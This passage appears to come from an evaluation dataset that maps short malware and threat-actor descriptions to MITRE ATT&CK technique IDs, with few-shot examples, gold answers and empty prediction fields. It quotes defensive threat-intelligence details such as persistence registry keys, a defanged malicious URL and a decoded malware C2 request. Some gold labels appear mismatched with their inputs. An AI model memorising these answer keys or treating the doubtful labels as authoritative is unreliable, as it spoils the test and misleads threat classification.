private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed. Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.\n\t - T1547: Boot or Logon Autostart Execution\n- Text: PoisonIvy creates a Registry key in the Active Setup pointing to a malicious executable.\n\t - T1547.014: Boot or Logon Autostart Execution - Active Setup\n", "input": "\nadds itself to the startup folder or adds itself to the Registry key SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run for persistence.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerDuke has a command to get text of the current foreground window.\n\t - T1010: Application Window Discovery\n- Text: collects data stored in the clipboard.\n\t - T1115: Clipboard Data\n- Text: EvilGrab has the capability to capture keystrokes.\n\t - T1056.001: Input Capture - Keylogging\n", "input": "\nmalware is capable of keylogging.", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cookie Notice . This website uses cookies to help personalize and improve your experience. By Continuing to use this site, you are consenting to the use of cookies. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials. Countries with targeted universities. Source: Secureworks) . After entering their credentials into the fake login page, victims were redirected to the legitimate website where they were automatically logged into a valid session or were prompted to enter their credentials again. Numerous spoofed domains referenced the targeted universities' online library systems, indicating the threat actors' intent to gain access to these resources. CTU\u2122 researchers were unable to confirm functionality of all identified spoofed pages because some of the domains were not accessible at the time of analysis. Domain registrations indicate the infrastructure to support this campaign was still being created when CTU researchers discovered the activity. A domain registered in May 2018 also contained subdomains spoofing university targets. These subdomains redirected visitors to spoofed login pages on other attacker-controlled domains\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: SideCopy has compromised domains for some of their infrastructure, including for C2 and staging malware.\n\t - T1584.001: Compromise Infrastructure - Domains\n", "input": "\nBankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity", "gold": "- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can take a desktop screenshot and save the file into \\ProgramData\\Mail\\MailAg\\shot.png.\n\t - T1113: Screen Capture\n- Text: DownPaper uses PowerShell for execution.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: LightNeuron exfiltrates data over its email C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n", "input": "\nThe C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In November 2018, Cisco Talos published research on an attack campaign named DNSpionage. It involved attacks using malware to compromise individual endpoints, but most interestingly described an effort to specifically hijack DNS entries of government organizations to redirect visitors to likely malicious, adversary operated systems. Both FireEye and Crowdstrike followed up with their own assessments for the DNS hijacking efforts, and described operations extending back to January 2017. No attribution to any known adversary groups was provided, other than that the target radius was primarily in the Middle East and the adversary was also likely operating out of that region. \n\t - T1584.002: Compromise Infrastructure - DNS Server\n\t - T1583.002: Acquire Infrastructure - DNS Server\n\t - T1496: Resource Hijacking\n\t - T1189: Drive-by Compromise\n- Text: Ke3chang malware RoyalDNS has used DNS for C2.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: In November 2018, Cisco Talos published research on an attack campaign named DNSpionage. It involved attacks using malware to compromise individual endpoints, but most interestingly described an effort to specifically hijack DNS entries of government organizations to redirect visitors to likely malicious, adversary operated systems. Both FireEye and Crowdstrike followed up with their own assessments for the DNS hijacking efforts, and described operations extending back to January 2017. No attribution to any known adversary groups was provided, other than that the target radius was primarily in the Middle East and the adversary was also likely operating out of that region. \n\t - T1584.002: Compromise Infrastructure - DNS Server\n\t - T1583.002: Acquire Infrastructure - DNS Server\n\t - T1496: Resource Hijacking\n\t - T1189: Drive-by Compromise\n", "input": "\nServer Command and control server that communicates via DNS tunneling Panel Graphical User Interface that allows actors to issue commands, upload and download files to Agents via the Server Table 2", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RegDuke can hide data in images, including use of the Least Significant Bit (LSB).\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: FoggyWeb has been XOR-encoded.\n\t - T1027: Obfuscated Files or Information\n- Text: Indeed, any decent firewall would block incoming packets to\u00a0any ports that have not explicitly been opened for operational purposes. However, with Chaos using a raw socket, the backdoor can be triggered on ports running an existing legitimate service. As an example, a Webserver that would only expose SSH (22), HTTP (80) and HTTPS (443) would not be reachable via a traditional backdoor due to the fact that those services are in use, but with Chaos it becomes possible\n\t - T1205: Traffic Signaling\n", "input": "\nFigures 8 and 9: LiteHTTP screenshots taken from the user`s profile in which the acronym \u201cKnock\u201d appears Conclusion SpeakUp`s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making", "gold": "- T1113: Screen Capture\n- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: StrongPity can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: identifies a proxy server if it exists and uses it to make HTTP requests.\n\t - T1090: Proxy\n- Text: The Winnti for Windows HTTP/S C2 mode can make use of an external proxy.\n\t - T1090.002: Proxy - External Proxy\n", "input": "\nOnce connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim\u2019s SOGU backdoor", "gold": "- T1543.003: Create or Modify System Process - Windows Service\n- T1016: System Network Configuration Discovery\n- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OilRig used the Plink utility and other tools to create tunnels to C2 servers.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: A module has a default C2 port of 13000.\n\t - T1571: Non-Standard Port\n- Text: PLEAD has used HTTP for communications with command and control (C2) servers.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nFor instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Denis obfuscates its code and encrypts the API names. Denis also encodes its payload in Base64.\n\t - T1027: Obfuscated Files or Information\n- Text: OopsIE uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", "input": "\nis loaded and executed by a highly obfuscated launcher.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Although the targeting profile is the same as the Russian banking cluster, the TTPs are very different. In particular, the use of tooling stands out from other clusters of CARBON SPIDER activity. As with other clusters, the primary infection vector is targeted spear phishing emails that use exploits for a variety of vulnerabilities in Microsoft Office:\n\t - T1203: Exploitation for Client Execution\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n\t - T1566: Phishing\n- Text: For example, the following sample loads the malware as shellcode within a .NET Framework project using msbuild.exe, effectively bypassing application allowlisting techniques\n\t - T1127.001: Trusted Developer Utilities Proxy Execution - MSBuild\n- Text: SUNBURST used VBScripts to initiate the execution of payloads.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nhas exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.", "gold": "- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cannon exfiltrates collected data over email via SMTP/S and POP3/S C2 channels.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: The actors split some archived exfiltration files into chunks smaller than 1MB.\n\t - T1030: Data Transfer Size Limits\n- Text: Remsec is capable of using HTTP and HTTPS for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nThe Trojan will then read the hexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to the C2 server via an HTTP GET request to a URL with the following structure:http:///resp?AAZ The upload command (2) writes data provided by the C2 to a specified file", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.\n\t - T1574.010: Hijack Execution Flow - Services File Permissions Weakness\n- Text: This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:\n\t - T1574.011: Hijack Execution Flow - Services Registry Permissions Weakness\n- Text: Some Sakula samples install themselves as services for persistence by calling WinExec with the \"net start\" argument.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", "input": "\nOne variant of locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.", "gold": "- T1574.010: Hijack Execution Flow - Services File Permissions Weakness", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators\n\t - T1124: System Time Discovery\n\t - T1082: System Information Discovery\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data:hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.phpMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)The downloaded third payload is obfuscated using the same technique\n\t - T1087: Account Discovery\n\t - T1027: Obfuscated Files or Information\n- Text: As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person\n\t - T1087.003: Account Discovery - Email Account\n\t - T1087.002: Account Discovery - Domain Account\n", "input": "\ncan be used to gather information on user accounts within a domain.", "gold": "- T1087: Account Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The following analytic detects a powershell script that enumerates the camera mounted to the targeted host.\n\t - T1592.001: Gather Victim Host Information - Hardware\n- Text: Andariel has limited its watering hole attacks to specific IP address ranges.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n- Text: These infections provide backdoor access that criminals use to determine whether the host is part of an Active Directory (AD) environment. If so, criminals deploy Cobalt Strike and perform reconnaissance to map the network\n\t - T1595: Active Scanning\n\t - T1592: Gather Victim Host Information\n", "input": "\nThese strings have the following format:uuid=[Victim ID]#un=[Username]#cn=[Hostname]#on=[OS Version]#lan=[IP Address]#nop=#ver=1.0uuid=[Victim ID]#un=[Username]#An example of the first string may be seen below:uuid=e29ac6c0-7037-11de-816d-806e6f6e696351c5#un=Josh Grunzweig#cn=WIN-LJLV2NKIOKP#on=mav6miv1#lan=192.168.217.141#nop=#ver=1.0It should be noted that the variables used for this string are different from previous versions", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C& Cs.\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n", "input": "\nThe shellcode of the embedded object is designed to download an image, which is, in fact, a new shellcode used to decode an embedded executable", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.\n\t - T1547.008: Boot or Logon Autostart Execution - LSASS Driver\n- Text: contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Chimera has used PsExec to deploy beacons on compromised systems.\n\t - T1569.002: System Services - Service Execution\n", "input": "\ndrops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.", "gold": "- T1547.008: Boot or Logon Autostart Execution - LSASS Driver", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can encrypt C2 traffic with AES.\n\t - T1573: Encrypted Channel\n- Text: obfuscated scripts that were used on victim machines.\n\t - T1027: Obfuscated Files or Information\n- Text: OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", "input": "\nencodes C2 traffic with single-byte XOR keys.", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: is capable of probing the network for open ports.\n\t - T1046: Network Service Discovery\n- Text: Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\t - T1595: Active Scanning\n\t - T1590: Gather Victim Network Information\n- Text: TeamTNT has scanned specific lists of target IP addresses.\n\t - T1595.001: Active Scanning - Scanning IP Blocks\n", "input": "\ncan perform port scans from an infected host.", "gold": "- T1046: Network Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: In contrast to the two samples used in these attacks, this one did not use a PE attachment, and instead used a Microsoft Word document containing a malicious macro as the delivery vehicle\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n- Text: All of the attacks involved spear-phishing emails to deliver malicious documents that required the recipient to carry out some action. The payload in a majority of these attacks was a backdoor called Spark, which is a backdoor that allows the threat actors to open applications and run command line commands on the compromised system\n\t - T1204.001: User Execution - Malicious Link\n\t - T1204.002: User Execution - Malicious File\n", "input": "\nhas sent spearphishing emails with attachments to victims as its primary initial access vector.", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BackConfig has the ability to gather the victim's computer name.\n\t - T1082: System Information Discovery\n- Text: HOPLIGHT has utilized Zlib compression to obfuscate the communications payload.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Rifdoor has encrypted command and control (C2) communications with a stream cipher.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nPOST /api/osx/started HTTP/1.1Host: r2elajikcosf7zee.onion.toAccept: */*Content-Length: 233Content-Type: application/x-www-form-urlencodedbot_id=9a8965ba04e72909f36c8d16aa801794c6d905d045c2b704e8f0a9bbb97d3eb8&data=psX0DKYB0u...5TximyY%2BQY%3D Figure 10: Malware sending initial information > rc4decrypt(base64decode(\"psX0DKYB0u...5TximyY+QY=\"), \"u2RLhh+!LGd9p8!ZtuKcN\")device_model=MacBookPro9,2bot_version=1.3.5build_name=elitef*ckos_version=15.5.0ip_address=4.5.6.7has_root=0 Figure 11: Decoded data sent to C&C The bot_id is constructed by hashing the following values with SHA-256: The hardware UUID (IOPlatformUUID) The system serial number (IOPlatformSerialNumber) The model identifier of the Mac (e.g.:\u00a0MacBookPro9,2) Most actions are self-explanatory", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SUNBURST collected hostname, OS version, and device uptime.\n\t - T1082: System Information Discovery\n- Text: malware IndiaIndia obtains and sends to its C2 server information about the first network interface card\u2019s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.\n\t - T1016: System Network Configuration Discovery\n- Text: SUNSPOT monitored running processes for instances of \"MsBuild.exe\" by hashing the name of each running process and comparing it to the corresponding value \"0x53D525\". It also extracted command-line arguments and individual arguments from the running \"MsBuild.exe\" process to identify the directory path of the Orion software Visual Studio solution.\n\t - T1057: Process Discovery\n", "input": "\nOSinfo: OSInfo is a general purpose, system information gathering tool", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has a command to download a file to the system from its C2 server.\n\t - T1105: Ingress Tool Transfer\n- Text: IcedID can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application.\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n- Text: Magic Hound has used PowerShell for execution and privilege escalation.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\ncan download files and upgrade itself.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Procmon shows the malicious module loaded using the regsvr32.exe process.\u00a0\u00a0 Phase two: Payload Analysis\u00a0 \u00a0 The only module the XSL script loads is Irdsnhrxxxfery64, which is packed using the UPX packer\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).\n\t - T1546.015: Event Triggered Execution - Component Object Model Hijacking\n- Text: Clop can make modifications to Registry keys.\n\t - T1112: Modify Registry\n", "input": "\nvariants have been seen that use Registry persistence to proxy execution through regsvr32.exe.", "gold": "- T1218.010: System Binary Proxy Execution - Regsvr32", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To establish persistence, identifies the Start Menu Startup directory and drops a link to its own executable disguised as an \u201cOffice Start,\u201d \u201cYahoo Talk,\u201d \u201cMSN Gaming Z0ne,\u201d or \u201cMSN Talk\u201d shortcut.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1036: Masquerading\n\t - T1547.001: Boot or Logon Autostart Execution - Registry 